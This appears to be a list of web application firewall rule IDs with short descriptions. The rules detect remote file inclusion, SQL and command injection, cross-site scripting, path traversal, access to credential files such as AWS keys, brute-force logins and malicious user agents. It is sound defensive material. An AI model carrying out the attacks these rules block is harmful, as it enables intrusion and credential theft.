+340628:: Remote File Injection attempt in ARGS
+340629:: Remote File Injection attempt in ARGS
+340630:: Remote File Injection attempt in ARGS
+340631:: Remote File Injection attempt in ARGS
+340632:: Remote File Injection attempt in ARGS
+340633:: Remote File Injection attempt in ARGS
+340634:: Remote File Injection attempt in ARGS
+340635:: Remote File Injection attempt in ARGS
+340636:: Remote File Injection attempt in ARGS
+340637:: Remote File Injection attempt in ARGS
+340638:: Remote File Injection attempt in ARGS
+340639:: Remote File Injection attempt in ARGS
+340640:: Remote File Injection attempt in ARGS
+340641:: Remote File Injection attempt in ARGS
+340642:: Remote File Injection attempt in ARGS
+340643:: Remote File Injection attempt in ARGS
+340644:: Remote File Injection attempt in ARGS
+340645:: Remote File Injection attempt in ARGS
+340646:: Remote File Injection attempt in ARGS
+340647:: Remote File Injection attempt in ARGS
+340648:: Remote File Injection attempt in ARGS
+340649:: Remote File Injection attempt in ARGS
+340650:: Remote File Injection attempt in ARGS
+340651:: Remote File Injection attempt in ARGS
+340652:: Remote File Injection attempt in ARGS
+340653:: Remote File Injection attempt in ARGS
+340654:: Remote File Injection attempt in ARGS
+340655:: Remote File Injection attempt in ARGS
+340656:: Remote File Injection attempt in ARGS
+340657:: Remote File Injection attempt in ARGS
+340658:: Remote File Injection attempt in ARGS
+340659:: Remote File Injection attempt in ARGS
+340660:: Remote File Injection attempt in ARGS
+340661:: Remote File Injection attempt in ARGS
+340662:: Remote File Injection attempt in ARGS
+340663:: Remote File Injection attempt in ARGS
+340664:: Remote File Injection attempt in ARGS
+340665:: Remote File Injection attempt in ARGS
+340666:: Remote File Injection attempt in ARGS
+340667:: Remote File Injection attempt in ARGS
+340668:: Remote File Injection attempt in ARGS
+340669:: Remote File Injection attempt in ARGS
+340670:: Remote File Injection attempt in ARGS
+340671:: Generic Path Recursion denied in URI/ARGS
+340672:: Remote File Injection attempt in ARGS
+340673:: Remote File Injection attempt in ARGS
+340674:: Remote File Injection attempt in ARGS
+340675:: Remote File Injection attempt in ARGS
+340676:: Remote File Injection attempt in ARGS
+340677:: Remote File Injection attempt in ARGS
+340678:: Remote File Injection attempt in ARGS
+340679:: Remote File Injection attempt in ARGS
+340680:: Remote File Injection attempt in ARGS
+340681:: Remote File Injection attempt in ARGS
+340682:: Remote File Injection attempt in ARGS
+340683:: Remote File Injection attempt in ARGS
+340684:: Remote File Injection attempt in ARGS
+340685:: Remote File Injection attempt in ARGS
+340686:: Remote File Injection attempt in ARGS
+340687:: Remote File Injection attempt in ARGS
+340690:: Remote File Injection attempt in ARGS
+340691:: Remote File Injection attempt in ARGS
+340692:: Remote File Injection attempt in ARGS
+340693:: Remote File Injection attempt in ARGS
+340694:: Remote File Injection attempt in ARGS
+340695:: Remote File Injection attempt in ARGS
+340696:: Remote File Injection attempt in ARGS
+340697:: Remote File Injection attempt in ARGS
+340698:: Remote File Injection attempt in ARGS
+340699:: Remote File Injection attempt in ARGS
+340700:: Remote File Injection attempt in ARGS
+340701:: Remote File Injection attempt in ARGS
+340702:: Remote File Injection attempt in ARGS
+340703:: Remote File Injection attempt in ARGS
+340704:: Remote File Injection attempt in ARGS
+340705:: Remote File Injection attempt in ARGS
+340706:: Remote File Injection attempt in ARGS
+340707:: Remote File Injection attempt in ARGS
+340708:: Remote File Injection attempt in ARGS
+340709:: Remote File Injection attempt in ARGS
+340710:: Remote File Injection attempt in ARGS
+340711:: Remote File Injection attempt in ARGS
+340712:: Remote File Injection attempt in ARGS
+340713:: Remote File Injection attempt in ARGS
+340714:: Remote File Injection attempt in ARGS
+340715:: Remote File Injection attempt in ARGS
+340716:: Remote File Injection attempt in ARGS
+340717:: Remote File Injection attempt in ARGS
+340718:: Remote File Injection attempt in ARGS
+340719:: Remote File Injection attempt in ARGS
+340720:: Remote File Injection attempt in ARGS
+340721:: Remote File Injection attempt in ARGS
+340722:: Remote File Injection attempt in ARGS
+340723:: Remote File Injection attempt in ARGS
+340724:: Remote File Injection attempt in ARGS
+340725:: Remote File Injection attempt in ARGS
+340726:: Remote File Injection attempt in ARGS
+340727:: Remote File Injection attempt in ARGS
+340730:: Remote File Injection attempt in ARGS
+340731:: Remote File Injection attempt in ARGS
+340732:: Remote File Injection attempt in ARGS
+340733:: Remote File Injection attempt in ARGS
+340734:: Remote File Injection attempt in ARGS
+340735:: Remote File Injection attempt in ARGS
+340736:: Remote File Injection attempt in ARGS
+340737:: Remote File Injection attempt in ARGS
+340738:: Remote File Injection attempt in ARGS
+340739:: Remote File Injection attempt in ARGS
+340740:: Remote File Injection attempt in ARGS
+340741:: Remote File Injection attempt in ARGS
+340742:: Remote File Injection attempt in ARGS
+340743:: Remote File Injection attempt in ARGS
+340744:: Remote File Injection attempt in ARGS
+340745:: Remote File Injection attempt in ARGS
+340746:: Remote File Injection attempt in ARGS
+340747:: Remote File Injection attempt in ARGS
+340748:: Generic Path Recursion denied
+340750:: Remote File Injection attempt in ARGS
+340752:: Remote File Injection attempt in ARGS
+340758:: Remote File Injection attempt in ARGS
+340760:: Remote File Injection attempt in ARGS
+340761:: Remote File Injection attempt in ARGS
+340762:: Remote File Injection attempt in ARGS
+340763:: Remote File Injection attempt in ARGS
+340764:: Remote File Injection attempt in ARGS
+340765:: Remote File Injection attempt in ARGS
+340766:: Remote File Injection attempt in ARGS
+340767:: Remote File Injection attempt in ARGS
+340768:: Remote File Injection attempt in ARGS
+340769:: Remote File Injection attempt in ARGS
+340770:: Remote File Injection attempt in ARGS
+340771:: Remote File Injection attempt in ARGS
+340772:: Remote File Injection attempt in ARGS
+340775:: Remote File Injection attempt in ARGS
+340776:: Remote File Injection attempt in ARGS
+340777:: Generic SQL injection protection
+340779:: Remote File Injection attempt in ARGS
+340780:: Remote File Injection attempt in ARGS
+340781:: Remote File Injection attempt in ARGS
+340782:: Remote File Injection attempt in ARGS
+340785:: Remote File Injection attempt in ARGS
+340786:: Remote File Injection attempt in ARGS
+340787:: Remote File Injection attempt in ARGS
+340788:: Remote File Injection attempt in ARGS
+340789:: Generic Path Recursion denied
+340790:: Remote File Injection attempt in ARGS
+340791:: Remote File Injection attempt in ARGS
+340792:: Remote File Injection attempt in ARGS
+340793:: Remote File Injection attempt in ARGS
+340794:: Generic Path Recursion denied
+340795:: Generic SQL injection protection 2
+340796:: Generic Path Recursion denied
+340797:: Remote File Injection attempt in ARGS
+340798:: Remote File Injection attempt in ARGS
+340799:: Generic SQL injection protection 2
+340800:: SQL Inject Generic signature
+340801:: Remote File Injection attempt in ARGS
+340802:: Remote File Injection attempt in ARGS
+340803:: Remote File Injection attempt in ARGS
+340804:: Remote File Injection attempt in ARGS
+340805:: Remote File Injection attempt in ARGS
+340806:: Remote File Injection attempt in ARGS
+340807:: Remote File Injection attempt in ARGS
+340808:: Remote File Injection attempt in ARGS
+340810:: Generic Path Recursion denied
+340811:: Remote File Injection attempt in ARGS
+340812:: Remote File Injection attempt in ARGS
+340813:: Remote File Injection attempt in ARGS
+340814:: Remote File Injection attempt in ARGS
+340815:: Remote File Injection attempt in ARGS
+340816:: Remote File Injection attempt in ARGS
+340817:: Cross Site Scripting Attack
+340818:: Generic XSS filter
+340819:: Cross Site Scripting Attack
+340820:: Cross Site Scripting Attack
+340821:: Generic XSS filter
+340822:: Cross Site Scripting Attack
+340823:: Cross Site Scripting Attack
+340824:: Cross Site Scripting Attack
+340825:: Generic SQL injection protection 2
+340826:: Generic SQL injection protection in ARGS
+340827:: Generic XSS filter
+340828:: Generic XSS filter
+340829:: Generic XSS filter
+340830:: Generic XSS filter
+340831:: Remote File Injection attempt in ARGS
+340832:: Remote File Injection attempt in ARGS
+340833:: Remote File Injection attempt in ARGS
+340834:: Remote File Injection attempt in ARGS
+340835:: Generic XSS filter
+340836:: Cross Site Scripting Attack
+340837:: Cross Site Scripting Attack
+340840:: Generic XSS filter
+340841:: Cross Site Scripting Attack
+340842:: Cross Site Scripting Attack
+340843:: Generic SQL injection protection 2
+340844:: Remote File Injection attempt in ARGS (AE)
+340845:: Remote File Injection attempt in ARGS (MM)
+340846:: Generic XSS filter
+340847:: Cross Site Scripting Attack
+340848:: Cross Site Scripting Attack
+340849:: Generic SQL injection protection
+340850:: Remote File Injection attempt in ARGS
+340851:: Remote File Injection attempt in ARGS
+340852:: Generic SQL injection protection 2
+340855:: Include Remote File Injection attempt in argument
+340860:: Protected Path Access denied in URI/ARGS
+340870:: Generic XSS filter
+340871:: Cross Site Scripting Attack
+340872:: Cross Site Scripting Attack
+340873:: Remote File Injection attempt in ARGS (AE)
+340874:: Remote File Injection attempt in ARGS (MM)
+341099:: cross site scripting attempt
+341137:: Potentially Bogus PHP file
+341149:: Cross Site Scripting Attack
+341211:: potentially untrusted encoded javascript detected
+341217:: potentially untrusted encoded javascript detected
+341544:: Generic SQL injection protection (/administrator/index2.php)
+341545:: Generic SQL injection protection (/administrator/index2.php)
+341592:: Remote File Injection attempt in ARGS
+341661:: Remote File Injection attempt in ARGS
+341662:: Remote File Injection attempt in ARGS
+341672:: Remote File Injection attempt in ARGS
+341673:: Remote File Injection attempt in ARGS
+341726:: Remote File Injection attempt in ARGS
+341727:: Remote File Injection attempt in ARGS
+341737:: Remote File Injection attempt in ARGS
+341738:: Remote File Injection attempt in ARGS
+341739:: Remote File Injection attempt in ARGS
+341740:: Remote File Injection attempt in ARGS
+341744:: Remote File Injection attempt in ARGS
+341745:: Remote File Injection attempt in ARGS
+341746:: Remote File Injection attempt in ARGS
+341776:: Remote File Injection attempt in ARGS
+341778:: Remote File Injection attempt in ARGS
+341808:: Generic SQL inline command protection (MM)
+341823:: Generic XSS filter
+342128:: Remote PHP command exection
+342259:: Possible HTML Injection
+343307:: Generic Path Recursion denied
+343329:: Attack Blocked -  command in REQUEST_URI or Argument
+343745:: Remote File Injection attempt in ARGS
+344156:: Generic SQL injection protection (/posting.php)
+344159:: Generic SQL inline command protection (MM)
+344195:: Attack Blocked -  PHP function in Argument - this may be an attack.
+344196:: Attack Blocked -  PHP function in Argument - this may be an attack.
+344296:: Attack Blocked -  PHP function in Argument - this may be an attack.
+344360:: Unauthorized Operating System File Access Attempt
+344376:: Code injection
+344377:: Code injection
+344378:: GraphQL Injection Attack attempt
+344516:: Generic SQL inline command protection (/admin/patch.php)
+344596:: Generic Path Recursion denied in URI/ARGS
+344729:: Potentially malicious code injection via WP plugin-editor
+344730:: Potentially malicious code injection via WP plugin-editor
+344731:: Potentially malicious code injection via WP plugin-editor
+345195:: Attack Blocked -  Base64 Encoded PHP function in Argument - this may be an attack.
+345729:: Potentially malicious code injection via WP theme-editor
+345730:: Potentially malicious code injection via WP theme-editor
+345731:: Potentially malicious code injection via WP theme-editor
+346144:: Generic SQL injection protection (/sregister2-p.php)
+347006:: Generic Path Recursion denied in URI/ARGS
+347008:: Suspicious deep path recursion denied
+347009:: Protected File access denied
+347016:: Invalid Generic Path Recursion denied in URI/ARGS
+347017:: Invalid Generic Path Recursion denied in URI/ARGS
+347019:: Suspicious path recursion denied
+347028:: Suspicious deep path recursion denied (base64 encoded)
+347099:: Vulnerability scanner attempting cross site scripting attempt
+347197:: cross site scripting attempt
+347198:: Vulnerability scanner attempting cross site scripting attempt
+347199:: Vulnerability scanner attempting cross site scripting attempt
+347714:: CMD injection
+350095:: Attack Blocked -  PHP attack in Argument
+350096:: Generic SQL injection protection
+350097:: Generic SQL injection protection in ARGS
+350147:: Potentially Untrusted Web Content Detected
+350148:: Potentially Untrusted Web Content Detected 
+350157:: Generic SQL inline command protection
+350159:: Generic SQL inline command protection (MM)
+350160:: Generic SQL Injection protection
+350247:: Potential Cross Site Scripting Attack
+350248:: Potential Cross Site Scripting Attack
+350249:: Potential Cross Site Scripting Attack
+350474:: Remote File Injection attempt in ARGS (mt.cgi)
+350475:: Remote File Injection attempt in ARGS (mt.cgi)
+350589:: Attack Blocked -  Data leakage - attempt to access vi recovery file (disable this rule if you require access to files that end with .mdb)
+350590:: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)
+350591:: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys
+350592:: Attack Blocked -  Data leakage - attempt to access AWS credentials
+350593:: Attack Blocked -  Data leakage - attempt to access stored vscode passwords
+350746:: Remote File Injection attempt in ARGS
+350756:: Remote File Injection attempt in ARGS
+350855:: Include File Injection attempt in argument
+359008:: Suspicious deep path recursion denied
+359208:: Suspicious deep path recursion denied
+360013:: Horde system configuration Leak Prevented
+360029:: Attack Blocked - command in REQUEST_URI or Argument
+360030:: Cross Site Scripting Attack
+360128:: Remote PHP command exection
+360663:: Remote File Injection attempt in ARGS
+360664:: Remote File Injection attempt in ARGS
+360665:: Generic SQL inline command protection (MM)
+360666:: PHP attack in Argument
+360667:: PHP attack in Argument
+360668:: Remote File Injection attempt in ARGS
+360669:: Remote File Injection attempt in ARGS
+360670:: Attempt to Access protect file Remotely
+360671:: Attempt to Access protect file Remotely
+360672:: Remote File Injection attempt in ARGS (AE)
+360673:: Remote File Injection attempt in ARGS (MM)
+360674:: Remote File Injection attempt in ARGS (AE)
+360675:: Remote File Injection attempt in ARGS (MM)
+360676:: Remote File Injection attempt in ARGS (AE)
+360677:: Remote File Injection attempt in ARGS (MM)
+360678:: Generic XSS filter
+360679:: Cross Site Scripting Attack
+361128:: Remote PHP command exection
+361129:: Remote File Injection attempt in ARGS (AE)
+361130:: Remote File Injection attempt in ARGS (MM)
+361131:: Attack Blocked -  PHP function in Argument - this may be an attack.
+361248:: Potential Cross Site Scripting Attack
+362129:: Remote File Injection attempt in ARGS (AE)
+362130:: Remote File Injection attempt in ARGS (MM)
+362131:: Remote File Injection attempt in ARGS (AE)
+362132:: Remote File Injection attempt in ARGS (MM)
+370016:: Generic SQL injection protection
+370144:: Generic SQL injection protection 2
+370147:: Generic XSS filter
+370148:: Cross Site Scripting Attack
+370149:: Remote File Injection attempt in ARGS (AE)
+370150:: Remote File Injection attempt in ARGS (MM)
+370151:: Remote File Injection attempt in ARGS (AE)
+370152:: Remote File Injection attempt in ARGS (MM)
+370153:: Remote File Injection attempt in ARGS (AE)
+370154:: Remote File Injection attempt in ARGS (MM)
+370155:: Remote File Injection attempt in ARGS (AE)
+370156:: Remote File Injection attempt in ARGS (MM)
+370157:: Potentially malicious PHP code injection attempt
+375726:: Remote File Injection attempt in ARGS
+375727:: Remote File Injection attempt in ARGS
+375737:: Remote File Injection attempt in ARGS
+376726:: Remote File Injection attempt in ARGS
+378451:: Remote File Injection attempt in ARGS (MM)
+380002:: PHP session cookie attack
+380006:: XSS Generic attack
+380007:: SQL Inject Generic signature
+380013:: ASL Configuration Leak Prevented
+380016:: SSI injection Attack
+380018:: Potentially malicious PHP code injection attempt
+380019:: Potentially malicious PHP code injection attempt - base64 encoded
+380020:: Potentially malicious PHP code injection attempt - hex encoded
+380023:: Generic SQL Injection protection
+380024:: Generic SQL Injection protection
+380025:: SQL injection with PHP/PERL payload
+380026:: PHP payload detected
+380027:: Code injection
+380028:: Code injection
+380122:: MySQL and PostgreSQL stored procedure/function injections
+380123:: SQL injection
+380572:: Attack Blocked -  SQL injection probe
+381025:: SQL injection with payload - base64 encoded
+381026:: SQL injection with PHP/PERL payload - hex encoded
+387123:: Generic php body attack attempt
+390147:: Potential Cross Site Scripting Attack
+390148:: Potential Cross Site Scripting Attack
+390572:: Attack Blocked -  SQL injection probe
+390581:: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)
+390582:: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)
+390583:: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)
+390584:: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)
+390585:: Attack Blocked -  XSS probe
+390586:: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)
+390587:: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)
+390588:: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)
+390589:: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .mdb)
+390597:: Attack Blocked -  Data Leakage - attempt to access backup system/application config file (disable this rule only if you want to allow anyone access to these backup files)
+390613:: Null Byte Attack Blocked (Invalid character in request or headers)
+390614:: Null Byte Attack Blocked (Invalid character in ARGS)
+390616:: POST request must have a Content-Length header
+390618:: Content-Length HTTP header is not numeric
+390626:: Null Byte Attack Blocked (Null byte character in Argument Name)
+390635:: XMLRPC encoded command injection attack
+390636:: XMLRPC SQL injection attack
+390706:: Expect Header Not Allowed for HTTP 1.0.  This is an HTTP 1.1 feature.
+390707:: Too many arguments in request (max set to 4096, increase as necessary for your system)
+390709:: Attempt to access protected file remotely
+390712:: Attack Blocked -  HTTP Response Splitting Attack
+390715::  PHP Injection Attack
+390719:: Attempt to access protected file remotely
+390725::  PHP Injection Attack
+390726::  PHP Injection Attack
+390727:: cross site scripting stealth attempt to inject javascript 
+390728:: Protected Path Access denied in URI/ARGS
+390729:: Remote File Injection attempt in ARGS (AE)
+390730:: Remote File Injection attempt in ARGS (MM)
+390731:: Generic Path Recursion denied
+390784:: Attack Blocked -  Data leakage - attempt to access debug log file (disable this rule if you require access to files that end with debug.log)
+390786:: Attack Blocked -  Data leakage - attempt to access log file (disable this rule if you require access to files that end with .log)
+391147:: Potential Cross Site Scripting Attack
+391148:: Potential Cross Site Scripting Attack
+392301:: Request Containing Content, but Missing Content-Type header
+393585:: XSS attack on ASL GUI
+393635:: XMLRPC base64 encoded command injection attack
+393636:: XMLRPC base64 encoded SQL injection attack
+393653:: command injection in URL blocked
+393654:: command injection in URL|ARGS blocked
+393655:: Possible Remote Command Execution: Unix Shell Expression Found
+395614:: Spammer attempting to defeat recapatcha
+331026::  SQL Operator Attack Detected.
+331027::  SQL Attack Detected.
+331028::  Unauthorized SQL access to database Detected.
+331029::  Obfuscated Javascript injection.
+331126::  SQL Operator Attack Detected.
+340196::  PHP function in Argument - this may be an attack.
+341145::  SQL injection probe
+341146::  SQL injection probe
+341147::  SQL injection probe
+341148::  RCE injection probe
+341155:: Generic SQL Injection protection
+341156:: Generic SQL Injection protection
+341245:: SQL injection attack (detectSQLi)
+341247::  SQL injection attack (detectSQLi)
+341250:: SQL injection attack (detectSQLi)
+360147:: Advanced SQL evasion protection
+360148:: Advanced SQL evasion protection
+360149:: SQL injection in Referer header blocked
+360150:: Advanced SQL evasion protection
+360151:: PHP Injection Attack: Variable Function Call Found
+360152:: PHP Injection Attack: Variables Found
+360153:: PHP Injection Attack: PPHP functions Found
+361148:: SQL version probe blocked
+361149:: MySQL waitfor probe blocked
+383023:: Potentially malicious PHP code injection attempt - base64 encoded
+390620:: UTF8 Encoding Abuse Attack Attempt
+311221::Atomicorp WAF Rules : XMLRPC - Ratelimiting calls/possible attack
+311222:: Login Detection: WordPress XMLRPC Failure
+377365:: Login Detection: Wordpress Admin Authentication Failure
+377366:: Login Detection: Wordpress Authentication Failure
+377369:: Login Failure Detection: Wordpress Authentication Failure
+377370:: Login Detection: Multiple Wordpress Authentication Failures from the same IP.
+361006:: MasterCard Credit Card Number sent from site to user
+361008::  Potential credit card number detected in output (NOT BLOCKED) -Visa Credit Card Number sent from site to user
+361010::  Potential credit card number detected in output (NOT BLOCKED) -American Express Credit Card Number sent from site to user
+361012::  Potential credit card number detected in output (NOT BLOCKED) -Diners Club Credit Card Number sent from site to user
+361016::  Potential credit card number detected in output (NOT BLOCKED) -Discover Credit Card Number sent from site to user
+361018::  Potential credit card number detected in output (NOT BLOCKED) -JCB Credit Card Number sent from site to user
+361019::  Potential Error Message with sensitive information sent from tomcat
+361020:: Potential credit card number detected in output (NOT BLOCKED) - GSA SmartPay Card Number sent from site to user
+361021::  Potential SQL Information Leakage
+361022::  Potential SQL Information Leakage
+361023::  Potential SQL Information Leakage
+361024:: Potential SQL Information Leakage
+361025:: SQL Information Leakage
+361026:: Potential Frontbase SQL Information Leakage detected
+361030::  Potential Microsoft SQL Error Message with sensitive information sent
+361031::  Potential IBM DB2 SQL Error Message with sensitive information sent
+361032::  Potential EMC Error Message with sensitive information sent
+361033::  Potential Firebirg Error Message with sensitive information sent
+361140::  Potential hsqldb SQL Error Message with sensitive information sent
+361141::  Potential Informix SQL Error Message with sensitive information sent
+361142::  Potential Informix SQL Error Message with sensitive information sent
+361143::  Potential Informix SQL Error Message with sensitive information sent
+361144::  Potential maxDB SQL Error Message with sensitive information sent
+361145::  Potential maxDB SQL Error Message with sensitive information sent
+361225:: SQLite Information Leakage
+361229::  Potential Orale SQL Error Message with sensitive information sent
+361230::  Wordpress Config file download blocked
+341256:: Possible Cross Site Scripting attack (detectXSS)
+341258:: Possible Cross Site Scripting attack (detectXSS) in Argument/Variable name
+341259:: Cross Site Scripting attack
+341266:: Possible Cross Site Scripting
+341267:: Possible Cross Site Scripting attack (detectXSS)
+307367:: Login Brute Force: Wordpress Authentication Probes detected .
+317368:: WHMCS brute force probe blocked.
+377300:: Login Failure Detection: VBulletin Login Attempt Failure 
+377301:: Login Failure Detection: PHPBB Login Attempt Failure 
+377302:: Login Failure Detection: Wikimedia Login Attempt Failure 
+377303:: Login Failure Detection: Sugarcrm Administration system Login Attempt Failure 
+377304:: Login Failure Detection: Joomla Administration Login Attempt Failure 
+377305:: Login Failure Detection: WordPress Login Attempt Failure 
+377306:: Login Failure Detection: Wordpress invalid username failure 
+377307:: Login Failure Detection: ASL GUI invalid username or password failure 
+377308:: Login Failure Detection: Drupal invalid username or password failure 
+377309:: Login Failure Detection: Typo3 invalid username or password failure 
+377310:: Login Failure Detection: MODX invalid username failure 
+377311:: Login Failure Detection: MODX password login failure 
+377312:: Login Failure Detection: Moodle login failure 
+377313:: Login Failure Detection: Plesk login failure 
+377314:: Login Failure Detection: Oscommerce customer login failure 
+377315:: Login Failure Detection: Oscommerce admin login failure 
+377316:: Login Failure Detection: ZenCart admin login failure 
+377317:: Login Failure Detection: Dokuwiki login failure 
+377319:: Login Failure Detection: Magento admin login failure 
+377320:: Login Failure Detection: Prestashop login failure (invalid password)
+377321:: Login Failure Detection: Prestashop login failure (invalid email)
+377322:: Login Failure Detection: Prestashop login failure (blank password)
+377323:: Login Failure Detection: ZenCart customer login failure 
+377326:: Login Failure Detection: PHPBB Login Attempt Failure - Incorrect Username 
+377360:: Login Failure Detection: Wordpress Login Attempt Failure 
+377363:: Login Failure Detection: Cpanel WHM Login Attempt Failure 
+377364:: Login Detection: Cpanel WHM root Login succeeded 
+377367:: Login Failure Detection: Multiple Wordpress Login Attempt Failure 
+377368:: Login Failure Detection: Multiple Wordpress Login Attempt Failure 
+377390:: Login Failure Detection: Wordpress Login with no user-agent or referrer, Bot attempting Wordpress Login
+377391:: Login Failure Detection: Wordpress Login with empty user-agent and referrer, possible bot
+377410:: Login Failure Detection: Recaptcha invalid code
+377605:: Login Failure Detection: WordPress Login Attempt Failure 
+377609:: Bruteforce Login Failure Detection: WordPress Multiple Simultaneous Login Attempt Failure 
+377619:: Bruteforce Login Failure Detection: WordPress Multiple Simultaneous Login Attempt Failure 
+377625:: Login Failure Detection: WordPress Login Attempt Failure 
+377626:: Potential WordPress Method Probe Detected 
+377679:: Login Failure Detection: WordPress Multiple Simultaneous Login Attempt Failure 
+377689:: Login Failure Detection: WordPress Multiple Simultaneous Login Attempt Failure 
+378410:: Login Failure Detection: WHMCS login failure
+307368:: Login Brute Force: Possible Wordpress Authentication Probes detected .
+344361:: Remote Command Execution: Unix Command Injection (2-3 chars)
+344362:: Remote Command Execution: Unix Command Injection (2-3 chars)
+344363:: Remote Command Execution: Unix Command Injection (2-3 chars)
+344364:: Remote Command Execution: Unix Command Injection (2-3 chars)
+344365:: Possible Command Injection using abnormal escape
+344366:: Remote Command Execution: Windows Command Injection
+344370::RCE Bypass Technique
+344372::XML eXternal Entity: Local / Remote File Inclusion attempt
+344373::XML eXternal Entity: DoS attempt
+340003:: PARANOID MODE XSS attack in request headers
+340006:: Generic Path Recursion denied in URI/ARGS
+340007:: PARANOID MODE Generic Path Recursion denied
+340008:: PARANOID MODE Bogus Path denied
+340009:: PARANOID MODE Protected Path Access denied in URI/ARGS
+340013:: PARANOID MODE Generic SQL injection in cookie or UA
+340014:: PARANOID MODE CMD injection
+340016:: PARANOID MODE Generic SQL injection protection
+340017:: PARANOID MODE Generic SQL injection protection in ARGS
+340018:: PARANOID MODE Generic command line attack filter
+340020:: PARANOID MODE XSS in referrer and UA headers
+340021:: PARANOID MODE PHP Injection Attack 1
+340029:: PARANOID MODE Possible command in REQUEST_URI or Argument
+340031:: PARANOID MODE Remote file inclusion
+340035:: PARANOID MODE Bogus file extensions
+340039:: PARANOID MODE PHP command injection attempt
+340077:: PARANOID MODE PHP policy violation
+340095:: PARANOID MODE Possible PHP function in Argument - this may be an attack.
+340102:: PARANOID MODE cross site scripting attempt
+340113:: PARANOID MODE cross site scripting stealth attempt to inject javascript 
+340128:: PARANOID MODE Remote PHP command exection
+340144:: PARANOID MODE Generic SQL injection protection 2
+340145:: PARANOID MODE Possible SQL injection probe
+340146:: PARANOID MODE Generic SQL metacharacter URI injection protection
+340147:: PARANOID MODE Potential Cross Site Scripting Attack
+340148:: PARANOID MODE Potential Cross Site Scripting Attack
+340149:: PARANOID MODE Potential Cross Site Scripting Attack
+340152:: PARANOID MODE Cross Site Scripting Attack (IE variant)
+340155:: PARANOID MODE Generic SQL Injection protection
+340157:: PARANOID MODE Generic SQL inline command protection
+340158:: PARANOID MODE XSS in referrer
+340159:: PARANOID MODE Generic SQL inline command protection (MM)
+340162:: PARANOID MODE Remote File Injection attempt in ARGS (AE)
+340163:: PARANOID MODE Remote File Injection attempt in ARGS (MM)
+340164:: PARANOID MODE SQL Injection Attack
+340165:: PARANOID MODE Uniencoded possible Remote File Injection attempt in URI (AE)
+340195:: PARANOID MODE Possible Base64 Encoded PHP function in Argument - this may be an attack.
+340210:: PARANOID MODE cross site scripting stealth attempt to access shell
+340211:: PARANOID MODE cross site scripting stealth attempt to access shell
+340855:: PARANOID MODE Include Remote File Injection attempt in argument
+347008:: PARANOID MODE Suspicious deep path recursion denied
+350147:: PARANOID MODE Potentially Untrusted Web Content Detected
+350148:: PARANOID MODE Potentially Untrusted Web Content Detected 
+380006:: PARANOID MODE XSS Generic attack
+380007:: PARANOID MODE SQL Inject Generic signature
+380012:: PARANOID MODE PDF XSS attack
+380016:: PARANOID MODE SSI injection Attack
+380018:: PARANOID MODE Potentially malicious PHP code injection attempt
+380019:: PARANOID MODE Potentially malicious PHP code injection attempt - base64 encoded
+380020:: PARANOID MODE Potentially malicious PHP code injection attempt - hex encoded
+380023:: PARANOID MODE Generic SQL Injection protection
+380024:: PARANOID MODE Generic SQL Injection protection
+380025:: PARANOID MODE SQL injection with PHP/PERL payload
+380121:: PARANOID MODE Perl echo shellcode injection
+380122:: PARANOID MODE MySQL and PostgreSQL stored procedure/function injections
+381025:: PARANOID MODE SQL injection with payload - base64 encoded
+381026:: PARANOID MODE SQL injection with PHP/PERL payload - hex encoded
+390572:: PARANOID MODE Possible SQL injection probe
+390614:: PARANOID MODE Invalid character in ARGS
+390707:: PARANOID MODE Too many arguments in request (max set to 1000, increase as necessary for your system)
+390708:: PARANOID MODE Session Fixation Attack
+390709:: PARANOID MODE Attempt to Access protect file Remotely
+390715:: PARANOID MODE  PHP Injection Attack
+390719:: PARANOID MODE Attempt to Access protect file Remotely
+392301:: PARANOID MODE Request Containing Content, but Missing Content-Type header
+330001:: Spam: Generic spam header detected
+330003:: XSS in User Agent field
+330004:: PHP code injection via User Agent
+330005:: PHP code injection via User Agent 2
+330010:: Bad User Agent: DataCha0s
+330011:: Bad User Agent: Known Exploit Tool Detected
+330014:: Exploit User Agent Detected
+330015:: Bad User Agent: Exploit tool
+330016:: Bad User Agent: Wordpress hash grabber
+330019:: Suspicious Web Client Detected (Disable this rule if you wish to allow these clients)
+330031:: Fake Browser User agent detected
+330033:: Malicious bot attack blocked
+330034:: Unauthorized Vulnerability Scanner detected
+330035:: Unauthorized Vulnerability Scanner detected
+330036:: Suspicious User agent detected.  Disable this rule if you use indy library.
+330037:: WhatWeb web scanner detected
+330038:: Suspicious Unusual User Agent (SAFEXPLORER)
+330039:: Suspicious Unusual User Agent (libwww-perl).  Disable this rule if you use libwww-perl. 
+330040:: Impolite bot - TwengaBot detected.  Disable this rule if you want to allow TwengaBot. 
+330041:: Suspicious User agent detected
+330042:: Suspicious User agent detected
+330043:: Suspicious User agent detected
+330045:: Suspicious Unusual User Agent (pycurl).  Disable this rule if you use pycurl. 
+330056:: Email Harvester Spambot User agent detected
+330057:: DRM Spider User agent detected
+330060:: Marketing Spider User agent detected
+330061:: Spambot User agent detected
+330070:: Suspicious unusual User Agent
+330076:: Possible Fake User Agent (Spammer converting spaces to plus signs)
+330079:: Comment Spammer User Agent
+330080:: Comment Spammer User Agent (Fake Gamboy UA)
+330081:: Fake Amiga Web Agent
+330082:: Known Exploit User Agent
+330083:: Fake GoogleBot
+330090:: Comment Spammer User Agent (Fake Windows Update Agent)
+330094:: Compromised User-Agent Agent Attack blocked
+330095:: Vadixbot User Agent String
+330096:: Concealed Defense User Agent String
+330097:: core-project/1.0 User Agent String
+330099:: backdoor User Agent String
+330100:: script injection User Agent String
+330101:: script injection User Agent String
+330102:: Stress Test User Agent String
+330103:: VoidEYE User Agent String
+330105:: Broken Bot Generic User Agent String Detected
+330110:: Scanbot User Agent String Detected
+330115:: Fake Google Searchengine User Agent String Detected
+330116:: Fake Sogou Searchengine User Agent String Detected
+330122:: Attack Script User Agent String Detected
+330124:: Email Harvester Spambot User Agent String Detected
+330125:: Scanbot User Agent String Detected
